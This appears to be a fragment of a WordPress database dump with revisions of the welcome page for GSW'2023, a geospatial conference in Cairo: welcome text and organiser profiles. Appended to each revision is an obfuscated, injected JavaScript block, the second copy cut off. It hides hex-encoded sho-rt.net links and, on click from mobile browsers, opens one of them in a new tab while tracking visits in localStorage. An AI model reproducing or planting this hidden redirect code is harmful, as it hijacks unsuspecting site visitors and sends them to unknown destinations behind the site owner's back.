Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2270\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael.png\" alt=\"\" width=\"118\" height=\"117\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-4613 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"94\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-2272 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"124\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n<p>&nbsp;</p>\n</section>\n</div>\n</div>\n</div>\n</div>\n</div>\n<footer id=\"footer\" class=\"footer solid-bg footer-outline-decoration full-width empty-footer\">\n<div id=\"bottom-bar\" class=\"solid-bg logo-left\" role=\"contentinfo\">\n<div class=\"wf-wrap\">\n<div class=\"wf-container-bottom\"></div>\n</div>\n</div>\n</footer>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 11:02:11','2023-06-03 11:02:11','',3233,'https://gsw2023.com/?p=4621',0,'revision','',0),
(4622,1,'2023-06-03 11:02:59','2023-06-03 11:02:59','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685790124691{margin-top: -80px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2270\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael.png\" alt=\"\" width=\"118\" height=\"117\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-4613 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"94\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-2272 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"124\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n<p>&nbsp;</p>\n</section>\n</div>\n</div>\n</div>\n</div>\n</div>\n<footer id=\"footer\" class=\"footer solid-bg footer-outline-decoration full-width empty-footer\">\n<div id=\"bottom-bar\" class=\"solid-bg logo-left\" role=\"contentinfo\">\n<div class=\"wf-wrap\">\n<div class=\"wf-container-bottom\"></div>\n</div>\n</div>\n</footer>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 